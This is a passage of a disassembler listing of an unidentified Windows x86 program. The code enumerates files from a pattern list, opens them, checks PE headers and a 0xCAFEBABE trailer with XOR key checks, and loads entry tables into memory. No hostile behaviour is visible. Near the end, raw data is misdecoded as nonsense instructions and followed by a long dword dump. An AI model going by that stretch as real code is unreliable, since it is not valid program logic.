loc_416F6A: ; CODE XREF: sub_416C60:loc_416FA4�j
mov eax, [ebp+var_19C]
add eax, 1
mov [ebp+var_19C], eax
loc_416F79: ; CODE XREF: sub_416C60+308�j
mov ecx, [ebp+var_19C]
cmp ecx, [ebp+var_3C]
jz short loc_416FA6
mov edx, [ebp+var_19C]
movsx eax, byte ptr [edx]
cmp eax, 3Bh
jnz short loc_416FA4
mov ecx, [ebp+var_19C]
mov byte ptr [ecx], 0
mov edx, [ebp+var_44]
add edx, 1
mov [ebp+var_44], edx
loc_416FA4: ; CODE XREF: sub_416C60+330�j
jmp short loc_416F6A
; ---------------------------------------------------------------------------
loc_416FA6: ; CODE XREF: sub_416C60+322�j
mov eax, [ebp+var_20]
add eax, 114h
mov edi, eax
mov edx, [ebp+var_40]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [ebp+var_50]
push ecx
mov edx, [ebp+var_40]
push edx
push 104h
mov eax, [ebp+var_1C]
push eax
call ds:dword_424688 ; GetFullPathNameA
mov edi, [ebp+var_40]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov ecx, [ebp+var_40]
push ecx
call ds:dword_424748 ; CharUpperBuffA
mov edx, [ebp+var_48]
mov [ebp+var_54], edx
mov [ebp+var_58], 0
jmp short loc_417019
; ---------------------------------------------------------------------------
loc_417010: ; CODE XREF: sub_416C60+522�j
mov eax, [ebp+var_58]
add eax, 1
mov [ebp+var_58], eax
loc_417019: ; CODE XREF: sub_416C60+3AE�j
mov ecx, [ebp+var_58]
cmp ecx, [ebp+var_44]
jnb loc_417187
mov edi, [ebp+var_54]
mov edx, [ebp+var_50]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [ebp+var_198]
push ecx
mov edx, [ebp+var_40]
push edx
call ds:dword_424650 ; FindFirstFileA
mov [ebp+var_1A0], eax
cmp [ebp+var_1A0], 0FFFFFFFFh
jz loc_417164
loc_41706C: ; CODE XREF: sub_416C60+4F1�j
mov eax, [ebp+var_198]
and eax, 10h
test eax, eax
jnz loc_41713B
mov ecx, [ebp+var_4C]
push ecx
lea edx, [ebp+var_16C]
push edx
call ds:dword_424740 ; lstrcmpi
test eax, eax
jz loc_41713B
lea edi, [ebp+var_16C]
mov edx, [ebp+var_50]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, [ebp+var_50]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov ecx, [ebp+var_50]
push ecx
call ds:dword_424748 ; CharUpperBuffA
mov [ebp+var_1A4], 0
mov [ebp+var_4], 1
push 0
push 1
mov edx, [ebp+var_40]
push edx
call loc_4173B0
add esp, 0Ch
mov [ebp+var_4], 0
jmp short loc_41713B
; ---------------------------------------------------------------------------
loc_417100: ; DATA XREF: _4:00421410�o
mov eax, [ebp+var_14]
mov ecx, [eax]
mov edx, [ecx]
mov [ebp+var_1E4], edx
mov eax, [ebp+var_1E4]
mov [ebp+var_1A4], eax
mov ecx, [ebp+var_1A4]
and ecx, 0EF000000h
xor eax, eax
cmp ecx, 0EF000000h
setz al
retn
; ---------------------------------------------------------------------------
loc_417131: ; DATA XREF: _4:00421414�o
mov esp, [ebp+var_18]
mov [ebp+var_4], 0
loc_41713B: ; CODE XREF: sub_416C60+417�j
; sub_416C60+430�j ...
lea edx, [ebp+var_198]
push edx
mov eax, [ebp+var_1A0]
push eax
call ds:dword_424654 ; FindNextFileA
test eax, eax
jnz loc_41706C
mov ecx, [ebp+var_1A0]
push ecx
call ds:dword_42464C ; FindClose
loc_417164: ; CODE XREF: sub_416C60+406�j
; sub_416C60+517�j
mov edx, [ebp+var_54]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_417179
mov ecx, [ebp+var_54]
add ecx, 1
mov [ebp+var_54], ecx
jmp short loc_417164
; ---------------------------------------------------------------------------
loc_417179: ; CODE XREF: sub_416C60+50C�j
mov edx, [ebp+var_54]
add edx, 1
mov [ebp+var_54], edx
jmp loc_417010
; ---------------------------------------------------------------------------
loc_417187: ; CODE XREF: sub_416C60+2F2�j
; sub_416C60+3BF�j
mov eax, [ebp+var_40]
mov [ebp+var_1B8], eax
mov ecx, [ebp+var_1B8]
push ecx
call sub_41BACD
add esp, 4
call sub_418070
push 10040h
call sub_41BA4A
add esp, 4
mov [ebp+var_1BC], eax
mov edx, [ebp+var_1BC]
mov ds:dword_424878, edx
push 10000h
call sub_41BA4A
add esp, 4
mov [ebp+var_1C0], eax
mov eax, [ebp+var_1C0]
mov ds:dword_42487C, eax
push 10000h
call sub_41BA4A
add esp, 4
mov [ebp+var_1C4], eax
mov ecx, [ebp+var_1C4]
mov ds:dword_424880, ecx
push 10000h
call sub_41BA4A
add esp, 4
mov [ebp+var_1C8], eax
mov edx, [ebp+var_1C8]
mov ds:dword_424884, edx
push 28h
call sub_41BA4A
add esp, 4
mov [ebp+var_1CC], eax
cmp [ebp+var_1CC], 0
jz short loc_417250
push 83h
mov ecx, [ebp+var_1CC]
call sub_41EA57
mov [ebp+var_1E8], eax
jmp short loc_41725A
; ---------------------------------------------------------------------------
loc_417250: ; CODE XREF: sub_416C60+5D6�j
mov [ebp+var_1E8], 0
loc_41725A: ; CODE XREF: sub_416C60+5EE�j
mov eax, [ebp+var_1E8]
mov ds:dword_424864, eax
push 28h
call sub_41BA4A
add esp, 4
mov [ebp+var_1D0], eax
cmp [ebp+var_1D0], 0
jz short loc_417296
push 83h
mov ecx, [ebp+var_1D0]
call sub_41EA57
mov [ebp+var_1EC], eax
jmp short loc_4172A0
; ---------------------------------------------------------------------------
loc_417296: ; CODE XREF: sub_416C60+61C�j
mov [ebp+var_1EC], 0
loc_4172A0: ; CODE XREF: sub_416C60+634�j
mov ecx, [ebp+var_1EC]
mov ds:dword_424868, ecx
push 28h
call sub_41BA4A
add esp, 4
mov [ebp+var_1D4], eax
cmp [ebp+var_1D4], 0
jz short loc_4172DD
push 83h
mov ecx, [ebp+var_1D4]
call sub_41EA57
mov [ebp+var_1F0], eax
jmp short loc_4172E7
; ---------------------------------------------------------------------------
loc_4172DD: ; CODE XREF: sub_416C60+663�j
mov [ebp+var_1F0], 0
loc_4172E7: ; CODE XREF: sub_416C60+67B�j
mov edx, [ebp+var_1F0]
mov ds:dword_424860, edx
push 28h
call sub_41BA4A
add esp, 4
mov [ebp+var_1D8], eax
cmp [ebp+var_1D8], 0
jz short loc_417324
push 83h
mov ecx, [ebp+var_1D8]
call sub_41EA57
mov [ebp+var_1F4], eax
jmp short loc_41732E
; ---------------------------------------------------------------------------
loc_417324: ; CODE XREF: sub_416C60+6AA�j
mov [ebp+var_1F4], 0
loc_41732E: ; CODE XREF: sub_416C60+6C2�j
mov eax, [ebp+var_1F4]
mov ds:dword_42486C, eax
mov [ebp+var_20], 0
mov [ebp+var_4], 0FFFFFFFFh
call sub_41734E
jmp short loc_41739F
sub_416C60 endp
; =============== S U B R O U T I N E =======================================
sub_41734E proc near ; CODE XREF: sub_416C60+6E7�p
; DATA XREF: _4:00421408�o
mov ecx, [ebp-1Ch]
mov [ebp-1DCh], ecx
mov edx, [ebp-1DCh]
push edx
call sub_41BACD
add esp, 4
cmp dword ptr [ebp-20h], 0
jz short loc_41738E
mov ds:dword_424888, 0
mov eax, [ebp-20h]
mov [ebp-1E0h], eax
mov ecx, [ebp-1E0h]
push ecx
call sub_41BACD
add esp, 4
loc_41738E: ; CODE XREF: sub_41734E+1C�j
cmp dword ptr [ebp-24h], 0FFFFFFFFh
jz short locret_41739E
mov edx, [ebp-24h]
push edx
call ds:dword_424624 ; CloseHandle
locret_41739E: ; CODE XREF: sub_41734E+44�j
retn
sub_41734E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_416C60
loc_41739F: ; CODE XREF: sub_416C60+6EC�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_416C60
; ---------------------------------------------------------------------------
loc_4173B0: ; CODE XREF: sub_416C60+284�p
; sub_416C60+48F�p
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421418
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFD9Ch
push ebx
push esi
push edi
mov dword ptr [ebp-20h], 0
mov edi, [ebp+8]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov [ebp-1Ch], ecx
mov dword ptr [ebp-28h], 0FFFFFFFFh
mov dword ptr [ebp-24h], 0
mov dword ptr [ebp-4], 0
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+8]
push eax
call ds:dword_424628 ; CreateFileA
mov [ebp-28h], eax
cmp dword ptr [ebp-28h], 0FFFFFFFFh
jnz short loc_417430
mov ecx, 0EF000005h
call sub_41BA32
loc_417430: ; CODE XREF: _3:00417424�j
push 0
mov ecx, [ebp-28h]
push ecx
call ds:dword_424680 ; GetFileSize
mov [ebp-4Ch], eax
mov dword ptr [ebp-70h], 0
mov edx, [ebp+10h]
and edx, 0FFh
test edx, edx
jz loc_417537
mov eax, ds:dword_424604
mov ecx, [eax+24h]
and ecx, 2
test ecx, ecx
jnz loc_417537
mov edx, ds:dword_424604
mov eax, [edx+4]
mov [ebp-78h], eax
mov ecx, [ebp-78h]
mov edx, [ebp-78h]
add edx, [ecx+3Ch]
mov ds:dword_424890, edx
mov eax, ds:dword_424890
cmp dword ptr [eax], 4550h
jz short loc_41749C
mov ecx, 0EF000002h
call sub_41BA32
loc_41749C: ; CODE XREF: _3:00417490�j
mov ecx, ds:dword_424890
add ecx, 98h
mov [ebp-74h], ecx
mov edx, [ebp-74h]
cmp dword ptr [edx], 0
jz loc_417537
mov eax, [ebp-74h]
cmp dword ptr [eax+4], 0
jz short loc_417537
mov ecx, [ebp-74h]
mov edx, [ebp-4Ch]
sub edx, [ecx]
neg edx
mov [ebp-70h], edx
mov eax, [ebp-74h]
mov ecx, [eax]
mov [ebp-4Ch], ecx
mov dword ptr [ebp-7Ch], 0
loc_4174DC: ; CODE XREF: _3:00417535�j
push 2
push 0
mov edx, [ebp-70h]
sub edx, 1
push edx
mov eax, [ebp-28h]
push eax
call ds:dword_424708 ; SetFilePointer
mov [ebp-84h], eax
push 0
lea ecx, [ebp-80h]
push ecx
push 1
lea edx, [ebp-7Ch]
push edx
mov eax, [ebp-28h]
push eax
call ds:dword_4246FC ; ReadFile
test eax, eax
jnz short loc_41751B
mov ecx, 0EF000006h
call sub_41BA32
loc_41751B: ; CODE XREF: _3:0041750F�j
cmp dword ptr [ebp-7Ch], 0
jz short loc_417523
jmp short loc_417537
; ---------------------------------------------------------------------------
loc_417523: ; CODE XREF: _3:0041751F�j
mov ecx, [ebp-70h]
sub ecx, 1
mov [ebp-70h], ecx
mov edx, [ebp-4Ch]
sub edx, 1
mov [ebp-4Ch], edx
jmp short loc_4174DC
; ---------------------------------------------------------------------------
loc_417537: ; CODE XREF: _3:00417451�j _3:00417464�j ...
push 2
push 0
mov eax, [ebp-70h]
sub eax, 4
push eax
mov ecx, [ebp-28h]
push ecx
call ds:dword_424708 ; SetFilePointer
mov [ebp-6Ch], eax
mov dword ptr [ebp-88h], 0
push 0
lea edx, [ebp-88h]
push edx
push 4
lea eax, [ebp-8Ch]
push eax
mov ecx, [ebp-28h]
push ecx
call ds:dword_4246FC ; ReadFile
test eax, eax
jz short loc_417582
cmp dword ptr [ebp-88h], 4
jz short loc_41758C
loc_417582: ; CODE XREF: _3:00417577�j
mov ecx, 0EF000006h
call sub_41BA32
loc_41758C: ; CODE XREF: _3:00417580�j
cmp dword ptr [ebp-8Ch], 0CAFEBABEh
jz short loc_4175AF
mov edx, [ebp-8Ch]
xor edx, 0CAFEBABEh
xor edx, [ebp-4Ch]
mov [ebp-24Ch], edx
jmp short loc_4175BA
; ---------------------------------------------------------------------------
loc_4175AF: ; CODE XREF: _3:00417596�j
mov eax, ds:dword_423BB0
mov [ebp-24Ch], eax
loc_4175BA: ; CODE XREF: _3:004175AD�j
mov ecx, [ebp-24Ch]
mov [ebp-90h], ecx
mov edx, [ebp+0Ch]
and edx, 0FFh
test edx, edx
jz short loc_4175EE
mov eax, offset dword_423BB0
lea ecx, [ebp-90h]
mov edx, [ecx]
cmp edx, [eax]
jz short loc_4175EE
mov ecx, 0EF000007h
call sub_41BA32
loc_4175EE: ; CODE XREF: _3:004175D1�j _3:004175E2�j
push 2
push 0
mov eax, [ebp-70h]
sub eax, 14h
push eax
mov ecx, [ebp-28h]
push ecx
call ds:dword_424708 ; SetFilePointer
mov dword ptr [ebp-94h], 0
push 0
lea edx, [ebp-94h]
push edx
push 10h
lea eax, [ebp-44h]
push eax
mov ecx, [ebp-28h]
push ecx
call ds:dword_4246FC ; ReadFile
test eax, eax
jz short loc_417633
cmp dword ptr [ebp-94h], 10h
jz short loc_41763D
loc_417633: ; CODE XREF: _3:00417628�j
mov ecx, 0EF000006h
call sub_41BA32
loc_41763D: ; CODE XREF: _3:00417631�j
mov edx, [ebp+10h]
and edx, 0FFh
neg edx
sbb edx, edx
and edx, 0Ch
mov [ebp-60h], edx
push 2
push 0
mov eax, [ebp-60h]
add eax, 2Ch
mov ecx, [ebp-70h]
sub ecx, eax
push ecx
mov edx, [ebp-28h]
push edx
call ds:dword_424708 ; SetFilePointer
mov dword ptr [ebp-98h], 0
mov eax, [ebp+10h]
and eax, 0FFh
test eax, eax
jz loc_417714
push 0
lea ecx, [ebp-98h]
push ecx
push 4
lea edx, [ebp-2Ch]
push edx
mov eax, [ebp-28h]
push eax
call ds:dword_4246FC ; ReadFile
test eax, eax
jz short loc_4176AA
cmp dword ptr [ebp-98h], 4
jz short loc_4176B4
loc_4176AA: ; CODE XREF: _3:0041769F�j
mov ecx, 0EF000006h
call sub_41BA32
loc_4176B4: ; CODE XREF: _3:004176A8�j
push 0
lea ecx, [ebp-98h]
push ecx
push 4
lea edx, [ebp-48h]
push edx
mov eax, [ebp-28h]
push eax
call ds:dword_4246FC ; ReadFile
test eax, eax
jz short loc_4176DA
cmp dword ptr [ebp-98h], 4
jz short loc_4176E4
loc_4176DA: ; CODE XREF: _3:004176CF�j
mov ecx, 0EF000006h
call sub_41BA32
loc_4176E4: ; CODE XREF: _3:004176D8�j
push 0
lea ecx, [ebp-98h]
push ecx
push 4
lea edx, [ebp-30h]
push edx
mov eax, [ebp-28h]
push eax
call ds:dword_4246FC ; ReadFile
test eax, eax
jz short loc_41770A
cmp dword ptr [ebp-98h], 4
jz short loc_417714
loc_41770A: ; CODE XREF: _3:004176FF�j
mov ecx, 0EF000006h
call sub_41BA32
loc_417714: ; CODE XREF: _3:0041767E�j _3:00417708�j
push 0
lea ecx, [ebp-98h]
push ecx
push 4
lea edx, [ebp-58h]
push edx
mov eax, [ebp-28h]
push eax
call ds:dword_4246FC ; ReadFile
test eax, eax
jz short loc_41773A
cmp dword ptr [ebp-98h], 4
jz short loc_417744
loc_41773A: ; CODE XREF: _3:0041772F�j
mov ecx, 0EF000006h
call sub_41BA32
loc_417744: ; CODE XREF: _3:00417738�j
push 0
lea ecx, [ebp-98h]
push ecx
push 4
lea edx, [ebp-68h]
push edx
mov eax, [ebp-28h]
push eax
call ds:dword_4246FC ; ReadFile
test eax, eax
jz short loc_41776A
cmp dword ptr [ebp-98h], 4
jz short loc_417774
loc_41776A: ; CODE XREF: _3:0041775F�j
mov ecx, 0EF000006h
call sub_41BA32
loc_417774: ; CODE XREF: _3:00417768�j
push 0
lea ecx, [ebp-98h]
push ecx
push 4
lea edx, [ebp-34h]
push edx
mov eax, [ebp-28h]
push eax
call ds:dword_4246FC ; ReadFile
test eax, eax
jz short loc_41779A
cmp dword ptr [ebp-98h], 4
jz short loc_4177A4
loc_41779A: ; CODE XREF: _3:0041778F�j
mov ecx, 0EF000006h
call sub_41BA32
loc_4177A4: ; CODE XREF: _3:00417798�j
push 0
lea ecx, [ebp-98h]
push ecx
push 4
lea edx, [ebp-5Ch]
push edx
mov eax, [ebp-28h]
push eax
call ds:dword_4246FC ; ReadFile
test eax, eax
jz short loc_4177CA
cmp dword ptr [ebp-98h], 4
jz short loc_4177D4
loc_4177CA: ; CODE XREF: _3:004177BF�j
mov ecx, 0EF000006h
call sub_41BA32
loc_4177D4: ; CODE XREF: _3:004177C8�j
push 0
lea ecx, [ebp-98h]
push ecx
push 4
lea edx, [ebp-64h]
push edx
mov eax, [ebp-28h]
push eax
call ds:dword_4246FC ; ReadFile
test eax, eax
jz short loc_4177FA
cmp dword ptr [ebp-98h], 4
jz short loc_417804
loc_4177FA: ; CODE XREF: _3:004177EF�j
mov ecx, 0EF000006h
call sub_41BA32
loc_417804: ; CODE XREF: _3:004177F8�j
push 0
lea ecx, [ebp-98h]
push ecx
push 4
lea edx, [ebp-50h]
push edx
mov eax, [ebp-28h]
push eax
call ds:dword_4246FC ; ReadFile
test eax, eax
jz short loc_41782A
cmp dword ptr [ebp-98h], 4
jz short loc_417834
loc_41782A: ; CODE XREF: _3:0041781F�j
mov ecx, 0EF000006h
call sub_41BA32
loc_417834: ; CODE XREF: _3:00417828�j
mov ecx, [ebp+10h]
and ecx, 0FFh
test ecx, ecx
jz loc_417A51
cmp dword ptr [ebp-48h], 0
jz loc_417A51
cmp dword ptr [ebp-2Ch], 0
jz loc_417A51
push 24h
call sub_41BA4A
add esp, 4
mov [ebp-21Ch], eax
mov edx, [ebp-21Ch]
mov [ebp-9Ch], edx
mov eax, [ebp-1Ch]
add eax, 1
push eax
call sub_41BA4A
add esp, 4
mov [ebp-220h], eax
mov ecx, [ebp-9Ch]
mov edx, [ebp-220h]
mov [ecx+0Ch], edx
mov ecx, [ebp-1Ch]
add ecx, 1
mov esi, [ebp+8]
mov eax, [ebp-9Ch]
mov edi, [eax+0Ch]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp-9Ch]
mov dword ptr [eax], 0
push 10h
call sub_41BA4A
add esp, 4
mov [ebp-224h], eax
mov ecx, [ebp-9Ch]
mov edx, [ebp-224h]
mov [ecx+4], edx
push 4
call sub_41BA4A
add esp, 4
mov [ebp-228h], eax
mov eax, [ebp-9Ch]
mov ecx, [ebp-228h]
mov [eax+8], ecx
mov edx, [ebp-9Ch]
mov dword ptr [edx+18h], 1
mov eax, [ebp-9Ch]
mov dword ptr [eax+14h], 0
push 0
push 0
mov ecx, [ebp-9Ch]
add ecx, 1Ch
push ecx
mov edx, [ebp-28h]
push edx
call ds:dword_424684 ; GetFileTime
mov edi, ds:dword_42488C
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov eax, ds:dword_424888
sub ecx, [eax+21Ch]
mov [ebp-0A0h], ecx
mov ecx, [ebp-0A0h]
add ecx, 1
push ecx
call sub_41BA4A
add esp, 4
mov [ebp-22Ch], eax
mov edx, [ebp-9Ch]
mov eax, [edx+4]
mov ecx, [ebp-22Ch]
mov [eax], ecx
mov edx, [ebp-9Ch]
mov eax, [edx+4]
mov ecx, [ebp-9Ch]
mov edx, [ecx+8]
mov eax, [eax]
mov [edx], eax
mov ecx, [ebp-0A0h]
add ecx, 1
mov edx, ds:dword_424888
mov esi, ds:dword_42488C
add esi, [edx+21Ch]
mov eax, [ebp-9Ch]
mov edx, [eax+8]
mov edi, [edx]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp-0A0h]
push ecx
mov edx, [ebp-9Ch]
mov eax, [edx+8]
mov ecx, [eax]
push ecx
call ds:dword_424748 ; CharUpperBuffA
mov edx, [ebp-9Ch]
mov eax, [edx+4]
mov ecx, [ebp-2Ch]
mov [eax+4], ecx
mov edx, [ebp-9Ch]
mov eax, [edx+4]
mov ecx, [ebp-48h]
mov [eax+8], ecx
mov edx, [ebp-9Ch]
mov eax, [edx+4]
mov ecx, [ebp-30h]
mov [eax+0Ch], ecx
mov edx, ds:dword_424888
mov [ebp-0A4h], edx
mov eax, [ebp-9Ch]
mov ecx, [ebp-0A4h]
mov edx, [ecx]
mov [eax+10h], edx
mov eax, [ebp-0A4h]
mov ecx, [ebp-9Ch]
mov [eax], ecx
mov edx, ds:dword_424888
mov eax, [edx+4]
add eax, 1
mov ecx, ds:dword_424888
mov [ecx+4], eax
loc_417A51: ; CODE XREF: _3:0041783F�j _3:00417849�j ...
mov edx, [ebp-4Ch]
sub edx, [ebp-50h]
mov [ebp-50h], edx
mov eax, [ebp-34h]
add eax, [ebp-50h]
mov [ebp-34h], eax
mov ecx, [ebp-4Ch]
sub ecx, [ebp-34h]
test ecx, ecx
jb short loc_417A78
mov edx, [ebp-4Ch]
sub edx, [ebp-34h]
cmp [ebp-58h], edx
jbe short loc_417A82
loc_417A78: ; CODE XREF: _3:00417A6B�j
mov ecx, 0EF000007h
call sub_41BA32
loc_417A82: ; CODE XREF: _3:00417A76�j
mov eax, [ebp-58h]
push eax
call sub_41BA4A
add esp, 4
mov [ebp-230h], eax
mov ecx, [ebp-230h]
mov [ebp-24h], ecx
mov dword ptr [ebp-178h], 0
mov dword ptr [ebp-17Ch], 0
push 0
push 0
mov edx, [ebp-34h]
push edx
mov eax, [ebp-28h]
push eax
call ds:dword_424708 ; CODE XREF: _3:00417B39�j
loc_417AC3: ; CODE XREF: _3:00417B19�j
mov ecx, [ebp-17Ch]
cmp ecx, [ebp-58h]
jz short loc_417B1B
mov dword ptr [ebp-178h], 0
push 0
lea edx, [ebp-178h]
push edx
mov eax, [ebp-58h]
sub eax, [ebp-17Ch]
push eax
mov ecx, [ebp-24h]
push ecx
mov edx, [ebp-28h]
push edx
call ds:dword_4246FC ; ReadFile
test eax, eax
jnz short loc_417B07
mov ecx, 0EF000006h
call sub_41BA32
loc_417B07: ; CODE XREF: _3:00417AFB�j
mov eax, [ebp-17Ch]
add eax, [ebp-178h]
mov [ebp-17Ch], eax
jmp short loc_417AC3
; ---------------------------------------------------------------------------
loc_417B1B: ; CODE XREF: _3:00417ACC�j
push 120000h
call sub_411B9E
rcr ch, 1
imul ebp, [esi+75FB48F1h], 0E6C2A7C0h
fadd qword ptr [ecx]
xchg eax, ecx
mov ds:0A7BAE2EFh, eax
ja short near ptr loc_417ABD+1
fstp tbyte ptr [ecx-64CC94F3h]
jmp far ptr 79C1h:0A858C6FBh
; ---------------------------------------------------------------------------
dword_417B48 dd 0A37034C6h, 9DABC4B6h, 738E9490h, 0E3D54F5Ch, 16F1CCD7h
dd 0CDDAB835h, 0B46ADCAFh, 74F852F6h, 0F69F12Ch, 89A5EB33h
dd 0BB78C042h, 95A3DCCEh, 6E886C88h, 0FAAD4754h, 0EEF9ECDFh
dd 0C5D28005h, 0D2339090h, 0EE75D285h, 0FE088D8Dh, 0EDE8FFFFh
dd 8B000032h, 8B50A845h, 8D51DC4Dh, 0FFFE088Dh, 32E6E8FFh
dd 958D0000h, 0FFFFFE74h, 88D8D52h, 0E8FFFFFEh, 338Dh
dd 4B9h, 74BD8D00h, 8DFFFFFEh, 0C033BC75h, 0A74A7F3h, 7B9h
dd 3E54E8EFh, 246A0000h, 3E65E8h, 4C48300h, 0FDCC8589h
dd 8D8BFFFFh, 0FFFFFDCCh, 8BE04D89h, 0C283E455h, 47E85201h
dd 8300003Eh, 858904C4h, 0FFFFFDC8h, 8BE0458Bh, 0FFFDC88Dh
dd 0C4889FFh, 83E44D8Bh, 758B01C1h, 0E0558B08h, 8B0C7A8Bh
dd 2E9C1C1h, 0C88BA5F3h, 0F303E183h, 0E04D8BA4h, 89DC558Bh
dd 0DC458B11h, 8BA44503h, 4189E04Dh, 9C558B04h, 5202E2C1h
dd 3DF5E8h, 4C48300h, 0FDC48589h, 458BFFFFh, 0C48D8BE0h
dd 89FFFFFDh, 558B0848h, 9C458BE0h, 8B184289h, 41C7E04Dh
dd 14h, 6A006A00h, 0E0558B00h, 521CC283h, 50D8458Bh, 468415FFh
dd 45C70042h, 0ACh, 8B09EB00h, 0C183AC4Dh, 0AC4D8901h
dd 3BAC558Bh, 830F9C55h, 0E3h, 0C1AC458Bh, 4D8B04E0h, 4518BE0h
dd 3DC4D8Bh, 558B020Ch, 4E2C1ACh, 8BE0458Bh, 0C890440h
dd 0AC4D8B10h, 8B04E1C1h, 428BE055h, 83C8B04h, 33FFC983h
dd 0F7AEF2C0h, 0FFC183D1h, 0FE048D89h, 8D8BFFFFh, 0FFFFFE04h
dd 5101C183h, 3D49E8h, 4C48300h, 0FDC08589h, 558BFFFFh
dd 8428BE0h, 8BAC4D8Bh, 0FFFDC095h, 881489FFh, 0FE048D8Bh
dd 0C183FFFFh, 0AC458B01h, 8B04E0C1h, 528BE055h, 2348B04h
dd 8BE0458Bh, 458B0850h, 823C8BACh, 0E9C1D18Bh, 8BA5F302h
dd 3E183CAh, 858BA4F3h, 0FFFFFE04h, 0AC4D8B50h, 8B04E1C1h
dd 428BE055h, 80C8B04h, 4815FF51h, 8B004247h, 0E2C1AC55h
dd 0E0458B04h, 8B04488Bh, 3041154h, 458BB055h, 4E0C1ACh
dd 8BE04D8Bh, 54890449h, 8E90401h, 8BFFFFFFh, 5503DC55h
dd 0FC7A81A8h, 0FEFEFEFEh, 0A8850Fh, 458B0000h, 0A84503DCh
dd 89F8488Bh, 0FFFDF88Dh, 0DC558BFFh, 8BA85503h, 8589F442h
dd 0FFFFFDFCh, 3DC4D8Bh, 0FFFDFC8Dh, 8D89FFh, 0C7FFFFFEh
dd 0FFFDF485h, 0FFh, 8B0FEB00h, 0FFFDF495h, 1C283FFh, 0FDF49589h
dd 858BFFFFh, 0FFFFFDF4h, 0FDF8853Bh, 3A73FFFFh, 0FDF48D8Bh
dd 0C96BFFFFh, 958B18h, 3FFFFFEh, 0F09589D1h, 8BFFFFFDh
dd 0FFFDF085h, 0DC4D8BFFh, 8B104803h, 0FFFDF095h, 104A89FFh
dd 0FDF0858Bh, 8589FFFFh, 0FFFFFDECh, 8D8BA9EBh, 0FFFFFE00h
dd 48700D89h, 958B0042h, 0FFFFFDF8h, 48741589h, 88A10042h
dd 89004248h, 0FFFDE885h, 0E88D8BFFh, 83FFFFFDh, 840F0039h
dd 153h, 8908558Bh, 0FFFDB095h, 0E8858BFFh, 8BFFFFFDh
dd 0C518B08h, 0FDAC9589h, 858BFFFFh, 0FFFFFDACh, 8D88088Ah
dd 0FFFFFDABh, 0FDB0958Bh, 0A3AFFFFh, 0BD804675h, 0FFFFFDABh
dd 8B317400h, 0FFFDAC85h, 1488AFFh, 0FDAA8D88h, 958BFFFFh
dd 0FFFFFDB0h, 75014A3Ah, 0AC858323h, 2FFFFFDh, 0FDB08583h
dd 8002FFFFh, 0FFFDAABDh, 0AE7500FFh, 0FDA485C7h, 0FFFFh
dd 0BEB0000h, 0D883C01Bh, 0A48589FFh, 8BFFFFFDh, 0FFFDA48Dh
dd 0A08D89FFh, 83FFFFFDh, 0FFFDA0BDh, 57D00FFh, 0B6E9h
dd 88158B00h, 83004248h, 958910C2h, 0FFFFFD9Ch, 0FDE8858Bh
dd 88BFFFFh, 890C518Bh, 0FFFD9895h, 98858BFFh, 8AFFFFFDh
dd 978D8808h, 8BFFFFFDh, 0FFFD9C95h, 750A3AFFh, 97BD8046h
dd 0FFFFFDh, 858B3174h, 0FFFFFD98h, 8801488Ah, 0FFFD968Dh
dd 9C958BFFh, 3AFFFFFDh, 2375014Ah, 0FD988583h, 8302FFFFh
dd 0FFFD9C85h, 0BD8002FFh, 0FFFFFD96h, 0C7AE7500h, 0FFFD9085h
dd 0FFh, 1B0BEB00h, 0FFD883C0h, 0FD908589h, 8D8BFFFFh
dd 0FFFFFD90h, 0FD8C8D89h, 0BD83FFFFh, 0FFFFFD8Ch, 0EB027500h
dd 0E8958B16h, 8BFFFFFDh, 10C08302h, 0FDE88589h, 9EE9FFFFh
dd 8BFFFFFEh, 958BE04Dh, 0FFFFFDE8h, 4189028Bh, 0E88D8B10h
dd 8BFFFFFDh, 1189E055h, 424888A1h, 4488B00h, 8B9C4D03h
dd 42488815h, 44A8900h, 0DC45C7h, 0C7000000h, 0E045h, 45C70000h
dd 0FFFFFFFCh, 2E8FFh, 4DEB0000h, 0FFD87D83h, 458B0A74h
dd 15FF50D8h, 424624h, 0DC7D83h, 4D8B1874h, 0BC8D89DCh
dd 8BFFFFFDh, 0FFFDBC95h, 9EE852FFh, 8300003Ah, 7D8304C4h
dd 187400E0h, 89E0458Bh, 0FFFDB885h, 0B88D8BFFh, 51FFFFFDh
dd 3A80E8h, 4C48300h, 0F04D8BC3h, 0D8964h, 5F000000h, 0E58B5B5Eh
dd 0CCCCC35Dh, 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418070 proc near ; CODE XREF: sub_416C60+53F�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_4E = byte ptr -4Eh
var_4D = byte ptr -4Dh
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
